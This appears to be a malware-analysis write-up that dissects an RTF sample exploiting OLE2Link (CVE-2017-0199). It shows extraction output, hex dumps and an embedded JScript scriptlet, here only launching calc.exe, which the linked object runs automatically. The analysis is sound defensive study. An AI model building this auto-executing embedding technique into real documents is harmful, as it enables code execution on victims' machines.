Embedded objects in OLE & OLE2 using links
Contents
.docx and .doc documents can contain embedded objects through a variety of methods, here we look at a sample using OLE linking and embedding.
Sample obtained from any.run
| Property | Value |
|---|---|
| File Type | Rich Text Format |
| File Size | 8.00 KB |
| FileTitle | OriginalRTF.bak.rtf |
| MD5 | 00f576ddeaf60756bfe671858434931c |
| SHA1 | 44c0d585482755dd945cea10458b82ca6cb620ff |
| SHA256 | 23c8f0fb9912538eee0bde49b2007e7e0f4efbd8bca69ddb9c05fafcee6f03ab |
Initial static analysis
{\rt{\object\objemb\objw1\objh1{\*\objclass Package}{\*\objdata 01050000020000000800...
}}{\object\objautlink\objupdate{\*\objclass Word.Document.8}{\*\objdata 01050...
You can see Word.Document.8 being used to embed a word document object. You can read up on how objects are embedded in RTF documents and OLE Exploits on the McAfee blog
Extracting the word document
Initially I tried to use rtfobj, but I ran up against issue 712, but there’s a fix from zdiff.
The following were extracted from the .rtf:
---+----------+---------------------------------------------------------------
id |index |OLE Object
---+----------+---------------------------------------------------------------
0 |0000003Fh |format_id: 2 (Embedded)
| |class name: b'Package'
| |data size: 619
| |OLE Package object:
| |Filename: 'QNV32ZJJYHRAJI9.sct'
| |Source path: 'C:\\fakepath\\QNV32ZJJYHRAJI9.sct'
| |Temp path = 'C:\\fakepath\\QNV32ZJJYHRAJI9.sct'
| |MD5 = '4c8ef666ff36eb0780dc4cfa7941a7de'
| |EXECUTABLE FILE
---+----------+---------------------------------------------------------------
1 |000005ADh |format_id: 2 (Embedded)
| |class name: b'OLE2Link'
| |data size: 2560
| |MD5 = 'ca72599a87f0d00eacd954ce96390459'
| |CLSID: 00000300-0000-0000-C000-000000000046
| |StdOleLink (embedded OLE object - Known Related to
| |CVE-2017-0199, CVE-2017-8570, CVE-2017-8759 or CVE-2018-8174)
| |Possibly an exploit for the OLE2Link vulnerability (VU#921560,
| |CVE-2017-0199)
---+----------+---------------------------------------------------------------
embedded QNV32ZJJYHRAJI9.sct
This .sct scriptlet simply runs calc.exe.
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
embedded OLE object
This is a OLE object, specifically a Word.Document.8, which is the Word 97 version. To analyse this older document type, use oledump.
$ python3 oledump.py OriginalRTF.bak.rtf_object_000005AD.bin'
1: 256 '\x01Ole'
2: 183 '\x03LinkInfo'
3: 6 '\x03ObjInfo'
b$ python3 oledump.py -s1 OriginalRTF.bak.rtf_object_000005AD.bin
00000000: 01 00 00 02 09 00 00 00 01 00 00 00 00 00 00 00 ................
00000010: 00 00 00 00 00 00 00 00 C0 00 00 00 09 03 00 00 ................
00000020: 00 00 00 00 C0 00 00 00 00 00 00 46 02 00 00 00 ...........F....
00000030: 03 03 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 ...............F
00000040: 00 00 1A 00 00 00 25 54 4D 50 25 5C 51 4E 56 33 ......%TMP%\QNV3
00000050: 32 5A 4A 4A 59 48 52 41 4A 49 39 2E 73 63 74 00 2ZJJYHRAJI9.sct.
00000060: 0E 00 AD DE 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000070: 00 00 00 00 00 00 00 00 38 00 00 00 32 00 00 00 ........8...2...
00000080: 03 00 25 00 54 00 4D 00 50 00 25 00 5C 00 51 00 ..%.T.M.P.%.\.Q.
00000090: 4E 00 56 00 33 00 32 00 5A 00 4A 00 4A 00 59 00 N.V.3.2.Z.J.J.Y.
000000A0: 48 00 52 00 41 00 4A 00 49 00 39 00 2E 00 73 00 H.R.A.J.I.9...s.
000000B0: 63 00 74 00 C6 AF AB EC 19 7F D2 11 97 8E 00 00 c.t.............
000000C0: F8 75 7E 2A 00 00 00 00 00 00 00 00 00 00 00 00 .u~*............
000000D0: 00 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF ................
000000E0: 06 09 02 00 00 00 00 00 C0 00 00 00 00 00 00 46 ...............F
000000F0: 00 00 00 00 FF FF FF FF 00 00 00 00 00 00 00 00 ................
$ python3 oledump.py -s2 OriginalRTF.bak.rtf_object_000005AD.bin
## Bunch of 0s
$ python3 oledump.py -s3 OriginalRTF.bak.rtf_object_000005AD.bin
00000000: 90 66 60 A6 37 B5 .f`.7.
This just runs the scriptlet from earlier.